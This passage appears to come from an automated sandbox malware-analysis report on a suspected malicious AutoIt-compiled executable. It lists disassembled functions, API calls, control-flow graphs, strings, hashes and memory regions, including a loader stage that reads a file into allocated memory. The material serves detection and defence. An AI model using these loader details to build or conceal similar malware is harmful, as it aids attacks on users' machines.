                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                            • String ID: FILE
                                                                                                                                                                            • API String ID: 3888824918-3121273764
                                                                                                                                                                            • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                            • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                                                                            • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                            • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                            • RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                            • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(009BF900,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                            • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                            • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                                                                            • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                            • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                            • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                            • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                              • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                              • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                              • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                              • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                              • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                              • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                              • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(009BF900,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                            • String ID: #$0$PGH
                                                                                                                                                                            • API String ID: 423443420-3673556320
                                                                                                                                                                            • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                            • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                                                            • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                            • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • _fseek.LIBCMT ref: 004525DA
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                                                                            • _fseek.LIBCMT ref: 0045267D
                                                                                                                                                                            • _malloc.LIBCMT ref: 00452689
                                                                                                                                                                            • _malloc.LIBCMT ref: 00452696
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1911931848-0
                                                                                                                                                                            • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                            • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                                                                            • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                            • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 228 40f450-40f45c call 425210 231 40f460-40f478 228->231 231->231 232 40f47a-40f4a8 call 413990 call 410f70 231->232 237 40f4b0-40f4d1 call 4151b0 232->237 240 40f531 237->240 241 40f4d3-40f4da 237->241 242 40f536-40f540 240->242 243 40f4dc-40f4de 241->243 244 40f4fd-40f517 call 41557c 241->244 245 40f4e0-40f4e2 243->245 248 40f51c-40f51f 244->248 247 40f4e6-40f4ed 245->247 249 40f521-40f52c 247->249 250 40f4ef-40f4f2 247->250 248->237 251 40f543-40f54e 249->251 252 40f52e-40f52f 249->252 253 42937a-4293a0 call 41557c call 4151b0 250->253 254 40f4f8-40f4fb 250->254 255 40f550-40f553 251->255 256 40f555-40f560 251->256 252->250 264 4293a5-4293c3 call 4151d0 253->264 254->244 254->245 255->250 258 429372 256->258 259 40f566-40f571 256->259 258->253 262 429361-429367 259->262 263 40f577-40f57a 259->263 262->247 265 42936d 262->265 263->250 264->242 265->258
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock_fseek_strcat
                                                                                                                                                                            • String ID: AU3!$EA06
                                                                                                                                                                            • API String ID: 3818483258-2658333250
                                                                                                                                                                            • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                            • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                                                                            • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 268 410130-410142 SHGetMalloc 269 410148-410158 SHGetDesktopFolder 268->269 270 42944f-429459 call 411691 268->270 271 4101d1-4101e0 269->271 272 41015a-410188 call 411691 269->272 271->270 278 4101e6-4101ee 271->278 280 4101c5-4101ce 272->280 281 41018a-4101a1 SHGetPathFromIDListW 272->281 280->271 282 4101a3-4101b1 call 411691 281->282 283 4101b4-4101c0 281->283 282->283 283->280
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                                                                            • String ID: C:\Users\user\Desktop\LlbpXphTu9.exe
                                                                                                                                                                            • API String ID: 192938534-3587479081
                                                                                                                                                                            • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                            • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                                                                            • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                            • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 286 40025f8-40026a6 call 4000048 289 40026ad-40026d3 call 4003508 CreateFileW 286->289 292 40026d5 289->292 293 40026da-40026ea 289->293 294 4002825-4002829 292->294 298 40026f1-400270b VirtualAlloc 293->298 299 40026ec 293->299 296 400286b-400286e 294->296 297 400282b-400282f 294->297 300 4002871-4002878 296->300 301 4002831-4002834 297->301 302 400283b-400283f 297->302 305 4002712-4002729 ReadFile 298->305 306 400270d 298->306 299->294 307 400287a-4002885 300->307 308 40028cd-40028e2 300->308 301->302 303 4002841-400284b 302->303 304 400284f-4002853 302->304 303->304 311 4002863 304->311 312 4002855-400285f 304->312 313 4002730-4002770 VirtualAlloc 305->313 314 400272b 305->314 306->294 315 4002887 307->315 316 4002889-4002895 307->316 309 40028f2-40028fa 308->309 310 40028e4-40028ef VirtualFree 308->310 310->309 311->296 312->311 317 4002772 313->317 318 4002777-4002792 call 4003758 313->318 314->294 315->308 319 4002897-40028a7 316->319 320 40028a9-40028b5 316->320 317->294 326 400279d-40027a7 318->326 322 40028cb 319->322 323 40028c2-40028c8 320->323 324 40028b7-40028c0 320->324 322->300 323->322 324->322 327 40027a9-40027d8 call 4003758 326->327 328 40027da-40027ee call 4003568 326->328 327->326 334 40027f0 328->334 335 40027f2-40027f6 328->335 334->294 336 4002802-4002806 335->336 337 40027f8-40027fc CloseHandle 335->337 338 4002816-400281f 336->338 339 4002808-4002813 VirtualFree 336->339 337->336 338->289 338->294 339->338
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040026C9
                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040028EF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2055232953.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4000000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 204039940-0
                                                                                                                                                                            • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                                                                                                            • Instruction ID: 9c2a52eb0ed16f2f782086435507e1b9b6f840198da3a103c6d8754791cb29d3
                                                                                                                                                                            • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA11974E01209EBEB24CFA4C898BEEB7B5BF48304F208599E505BB2C0D775AE45DB51

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 340 414f10-414f2c 341 414f4f 340->341 342 414f2e-414f31 340->342 343 414f51-414f55 341->343 342->341 344 414f33-414f35 342->344 345 414f37-414f46 call 417f23 344->345 346 414f56-414f5b 344->346 358 414f47-414f4c call 417ebb 345->358 347 414f6a-414f6d 346->347 348 414f5d-414f68 346->348 351 414f7a-414f7c 347->351 352 414f6f-414f77 call 4131f0 347->352 348->347 350 414f8b-414f9e 348->350 356 414fa0-414fa6 350->356 357 414fa8 350->357 351->345 355 414f7e-414f89 351->355 352->351 355->345 355->350 361 414faf-414fb1 356->361 357->361 358->341 362 4150a1-4150a4 361->362 363 414fb7-414fbe 361->363 362->343 365 414fc0-414fc5 363->365 366 415004-415007 363->366 365->366 367 414fc7 365->367 368 415071-415072 call 41e6b1 366->368 369 415009-41500d 366->369 370 415102 367->370 371 414fcd-414fd1 367->371 379 415077-41507b 368->379 373 41500f-415018 369->373 374 41502e-415035 369->374 382 415106-41510f 370->382 377 414fd3 371->377 378 414fd5-414fd8 371->378 380 415023-415028 373->380 381 41501a-415021 373->381 375 415037 374->375 376 415039-41503c 374->376 375->376 383 415042-41504e call 41453a call 41ed9e 376->383 384 4150d5-4150d9 376->384 377->378 385 4150a9-4150af 378->385 386 414fde-414fff call 41ee9b 378->386 379->382 387 415081-415085 379->387 388 41502a-41502c 380->388 381->388 382->343 408 415053-415058 383->408 393 4150eb-4150fd call 417f23 384->393 394 4150db-4150e8 call 4131f0 384->394 389 4150b1-4150bd call 4131f0 385->389 390 4150c0-4150d0 call 417f23 385->390 402 415099-41509b 386->402 387->384 395 415087-415096 387->395 388->376 389->390 390->358 393->358 394->393 395->402 402->362 402->363 409 415114-415118 408->409 410 41505e-415061 408->410 409->382 410->370 411 415067-41506f 410->411 411->402
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3886058894-0
                                                                                                                                                                            • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                            • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                                                                            • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                            • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • _memset.LIBCMT ref: 00401C62
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                            • API String ID: 1620655955-1585850449
                                                                                                                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 445 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 446 40023f8-40024f7 call 4000048 call 40022e8 CreateFileW 453 40024f9 446->453 454 40024fe-400250e 446->454 455 40025ae-40025b3 453->455 457 4002510 454->457 458 4002515-400252f VirtualAlloc 454->458 457->455 459 4002531 458->459 460 4002533-400254a ReadFile 458->460 459->455 461 400254c 460->461 462 400254e-4002588 call 4002328 call 40012e8 460->462 461->455 467 40025a4-40025ac ExitProcess 462->467 468 400258a-400259f call 4002378 462->468 467->455 468->467
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 040022E8: Sleep.KERNELBASE(000001F4), ref: 040022F9
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040024ED
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2055232953.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4000000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFileSleep
                                                                                                                                                                            • String ID: P00GY9NTKX44PG
                                                                                                                                                                            • API String ID: 2694422964-1431926293
                                                                                                                                                                            • Opcode ID: e1475a97fe62214a9558e0956695a832dbb519a65de1946df38b87aa48b33148
                                                                                                                                                                            • Instruction ID: 398bb294524217c38283e7e38eb4857a0de228453b84ee434cb332f1cfac8a46
                                                                                                                                                                            • Opcode Fuzzy Hash: e1475a97fe62214a9558e0956695a832dbb519a65de1946df38b87aa48b33148
                                                                                                                                                                            • Instruction Fuzzy Hash: C4517331D04249DBEF11DBE4C819BEEBBB9AF45305F004199E208BB2C0D7795B45CBA6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 470 413a88-413a99 call 41718c 473 413b10-413b15 call 4171d1 470->473 474 413a9b-413aa2 470->474 476 413aa4-413abc call 418407 call 419f6d 474->476 477 413ae7 474->477 487 413ac7-413ad7 call 413ade 476->487 488 413abe-413ac6 call 419f9d 476->488 479 413ae8-413af8 RtlFreeHeap 477->479 479->473 481 413afa-413b0f call 417f23 GetLastError call 417ee1 479->481 481->473 487->473 495 413ad9-413adc 487->495 488->487 495->479
                                                                                                                                                                            APIs
                                                                                                                                                                            • __lock.LIBCMT ref: 00413AA6
                                                                                                                                                                              • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                                                                              • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                                                                              • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                                                                            • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                                                                            Memory Dump Source
